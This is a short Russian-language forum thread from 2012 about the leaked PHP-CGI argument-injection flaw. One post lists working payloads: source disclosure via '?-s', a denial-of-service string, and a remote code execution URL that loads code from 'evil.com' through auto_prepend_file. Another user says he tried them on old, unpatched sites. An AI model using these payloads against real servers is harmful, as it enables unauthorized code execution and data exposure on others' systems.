Критическая уязвимость PHP случайно опубликована в открытом доступе
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Критическая уязвимость PHP случайно опубликована в открытом доступе - 2012-05-05 15:18:48.520000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
Лучше-б показали, как это конкретно использовать… Ибо не выходит нихера с примером www.testsite.bb/index.php?-s
|
|
|
RE: Критическая уязвимость PHP случайно опубликована в открытом доступе - 2012-05-05 15:33:29.846666
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
ага… нашел вроде, но всё-равно не очень-то и работает… даже на старых сайтах, где пхп точно давно не обновляли… или я что-то неправильно делаю?
code disclosure with /?-s (this is the most well-known one)
dos with “?-t+100000” (careful, this will dos your browser rendering engine too, so you should do this via curl)
arbitrary file execution circumventing all acls apart from the os acls: bind a fastcgi instance with -b 12345, then proxy a request (via nginx + fastcgi proxy module, for example) and set sсriрt_filename accordingly. it’s a bit contrived, but just for the sake of completeness
remote code execution: /?-d%20allow_url_include%3don+-d%20auto_prepend_file%3dhttp://evil.com/code.txt%20-n - this negates php.ini settings and suhosin extension (since the “-n” flag tells php not to use an php.ini file at all, hence the suhosin extension is not loaded).
|
|
|
RE: Критическая уязвимость PHP случайно опубликована в открытом доступе - 2012-05-07 14:54:52.360000
|
|
|
Guest
Сообщений: 83368
Оценки: 51
Присоединился: None
|
читайте внимательнее, написанно что уязвимость касается только CGI, а если сервак настроек как модуль апача (как у всех большенства) то такой проблемы не будет
|
|
|
|
|